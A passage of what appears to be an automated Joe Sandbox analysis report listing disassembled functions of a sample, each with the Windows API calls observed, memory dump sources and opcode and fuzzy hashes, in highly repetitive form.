                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 226a75081ce26f23f5966b74af185c554c71632798e6e77ca234cfd69f88e8dc
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: 226a75081ce26f23f5966b74af185c554c71632798e6e77ca234cfd69f88e8dc
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              Function 00E849E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 9dab2befde53527a536c230596ca9c02e6f3e96bb700513ebfb4575255fc7081
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: 9dab2befde53527a536c230596ca9c02e6f3e96bb700513ebfb4575255fc7081
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              Function 00E849F8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: 0657613e417671cf7740022023628f36fb59682a105893216cf919e2e4d8b6ee
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: 0657613e417671cf7740022023628f36fb59682a105893216cf919e2e4d8b6ee
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              Function 00E849D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: d335f50eaed1f5bb23d6ec7ce966c248287a9ca64112d04cd8f14183d20ae53d
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: d335f50eaed1f5bb23d6ec7ce966c248287a9ca64112d04cd8f14183d20ae53d
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              Function 00E849B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: e813988508b2b041516a2c2bb46659bf7d08e9e89ba0a88085376ce25b15c4fa
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: e813988508b2b041516a2c2bb46659bf7d08e9e89ba0a88085376ce25b15c4fa
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              Function 00E84976 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: dcf2680d8f2af60a2a0334f2dadf452090dfa06e6577412ff5c512dbb4a0e1f9
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: dcf2680d8f2af60a2a0334f2dadf452090dfa06e6577412ff5c512dbb4a0e1f9
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              Function 00E84A02 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00E84918
                                                                                                • Part of subcall function 00E84FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E85041
                                                                                                • Part of subcall function 00E84FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E85052
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: gI
                                                                                              • API String ID: 1269201914-2132779308
                                                                                              • Opcode ID: c824687e45493897461b30dd5971647cab3b89ec0b518f58979817259e36e7fc
                                                                                              • Instruction ID: a2be36c03773d9641360b6d4c0e0d8c76184cc3ca09b254ab58e869df3749ec9
                                                                                              • Opcode Fuzzy Hash: c824687e45493897461b30dd5971647cab3b89ec0b518f58979817259e36e7fc
                                                                                              • Instruction Fuzzy Hash: ECA011C22AC223BC3208B2203E02C3B020CC0CABA0330BA0EF00EE80C2A88828800230
                                                                                              Function 00E6E3D5 Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,?,00000000,?,00000000,00E6E3B1,?,?,00000000,?,?,00E6CC21,?), ref: 00E6E55F
                                                                                              • GetLastError.KERNEL32 ref: 00E6E56E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: e19f78f74a78870f127e2e427a46d7d64d721c759edf0c3f0cba8ac948c59e2d
                                                                                              • Instruction ID: c5c7b6c7677f8d46e2ccfe3e9d770e22d5261d510501420a64c8f6effde6d898
                                                                                              • Opcode Fuzzy Hash: e19f78f74a78870f127e2e427a46d7d64d721c759edf0c3f0cba8ac948c59e2d
                                                                                              • Instruction Fuzzy Hash: 1E411538644740CBC724AF75E4846EAB3E5FF583A4F14551ED866A33C1EB70DC458BA1
                                                                                              Function 00E926D7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E90005: GetLastError.KERNEL32(?,?,00E8B581,?,00EAE088,?,00E8AE80,?,00EAE088,?,00000007), ref: 00E90009
                                                                                                • Part of subcall function 00E90005: _free.LIBCMT ref: 00E9003C
                                                                                                • Part of subcall function 00E90005: SetLastError.KERNEL32(00000000,00EAE088,?,00000007), ref: 00E9007D
                                                                                                • Part of subcall function 00E90005: _abort.LIBCMT ref: 00E90083
                                                                                                • Part of subcall function 00E927FE: _abort.LIBCMT ref: 00E92830
                                                                                                • Part of subcall function 00E927FE: _free.LIBCMT ref: 00E92864
                                                                                                • Part of subcall function 00E9246B: GetOEMCP.KERNEL32(00000000,?,?,00E926F4,?), ref: 00E92496
                                                                                              • _free.LIBCMT ref: 00E9274F
                                                                                              • _free.LIBCMT ref: 00E92785
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: e67f39d54269a7a3aed6be941c6e4789fd5040b444cf8bff39ae059920b2ac9d
                                                                                              • Instruction ID: 7eee47a368846c72339e6058aa4f15900e94754f44eb181b587965b2c0015d96
                                                                                              • Opcode Fuzzy Hash: e67f39d54269a7a3aed6be941c6e4789fd5040b444cf8bff39ae059920b2ac9d
                                                                                              • Instruction Fuzzy Hash: D1319131904208BFDF10EBA9D841BA9B7F5AF45324F25509EE604BB2A2EB729D41DB50
                                                                                              Function 00E6E772 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?), ref: 00E6E78C
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00E6E840
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              • Opcode ID: cc3839a022ce878dc7eec05aa97d76de1b2b9539193a7a34c88993ad7d06be75
                                                                                              • Instruction ID: 5c7a4f9d454fbdc2b0a3382853bb0e98be90923ed198c787d15f3802b951f0d3
                                                                                              • Opcode Fuzzy Hash: cc3839a022ce878dc7eec05aa97d76de1b2b9539193a7a34c88993ad7d06be75
                                                                                              • Instruction Fuzzy Hash: 28210439289241EFC714DE24D481AABBBE8AF91748F04591EF4C593281D328F90CC762
                                                                                              Function 00E6E850 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00E6E897
                                                                                              • GetLastError.KERNEL32 ref: 00E6E8A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: 76243115cfdc44f237a44964e62f693b990d14276443b6426e5d27143ceb57c3
                                                                                              • Instruction ID: 218e5287f4e42c96d337622e0e0f8f336195601f38ac754250e5a3b5729e574b
                                                                                              • Opcode Fuzzy Hash: 76243115cfdc44f237a44964e62f693b990d14276443b6426e5d27143ceb57c3
                                                                                              • Instruction Fuzzy Hash: 9911E534680700AFE7389625D8817A677E9AB453B4F641769E062B36D0D7B0FD05CB60
                                                                                              Function 00E61CE2 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E61CE9
                                                                                              • GetDlgItem.USER32(?,?), ref: 00E61D01
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_Item_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 896027972-0
                                                                                              • Opcode ID: de0bd63f4e8a40f9d0cb9206cbd0e9a858d674b47388bc581233fc1a659119bb
                                                                                              • Instruction ID: bec1e4e02c7086ab1079f35846da9d2946aec042edbcebf38036a896e50b5fdf
                                                                                              • Opcode Fuzzy Hash: de0bd63f4e8a40f9d0cb9206cbd0e9a858d674b47388bc581233fc1a659119bb
                                                                                              • Instruction Fuzzy Hash: F001F7716803048FD722EFA8E846BEDB7ECEF54385F08214AF91AB7292CB705A01C750
                                                                                              Function 00E776A7 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00E776EA,00E70B6F), ref: 00E776B4
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000,?,00E776EA), ref: 00E776BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: fc8c080ebc7a6163ae1de9c95a087aaf544d8870ee40912a01e32b75ecc7411d
                                                                                              • Instruction ID: ec7fc999b03f12fd700887fba517f18603095a26f007640d5137872070762fc1
                                                                                              • Opcode Fuzzy Hash: fc8c080ebc7a6163ae1de9c95a087aaf544d8870ee40912a01e32b75ecc7411d
                                                                                              • Instruction Fuzzy Hash: 0FE0D833F14506ABCF1997ED9C059EB72DDEB44248724907AE457F3104F974DD0547A0
                                                                                              Function 00E7F53A Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00E99B73,000000FF), ref: 00E7F578
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00E99B73,000000FF), ref: 00E7F57D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: 97011c648c17a510ed3c5f99ba9c14c49c1ad7e8306f2d7a450af84f5d3c27d0
                                                                                              • Instruction ID: 5683d32bb396c11f0bb33935a5e0ca150c2ded07c7d5c184760199e830b69703
                                                                                              • Opcode Fuzzy Hash: 97011c648c17a510ed3c5f99ba9c14c49c1ad7e8306f2d7a450af84f5d3c27d0
                                                                                              • Instruction Fuzzy Hash: ECF08276604A04AFC700DF5AEC41B4ABBE8FB49770F00422AF416E3760DB74A804CAA4
                                                                                              Function 00E7E849 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E7E86A
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E7E871
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: d9a82ca3c973f8dcaaf998671294584af0d8231b8d02dfa8a279502d0ad0affa
                                                                                              • Instruction ID: 8f6f147eee3c88231a082ead82426133738f9d6d8751259a060a6eb0825846f0
                                                                                              • Opcode Fuzzy Hash: d9a82ca3c973f8dcaaf998671294584af0d8231b8d02dfa8a279502d0ad0affa
                                                                                              • Instruction Fuzzy Hash: 59E09271800218EFDB10EF84C8017DDB7F8EB09350F20C05AA88DB3301EAB0AE00EB91
                                                                                              Function 00E61E1F Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
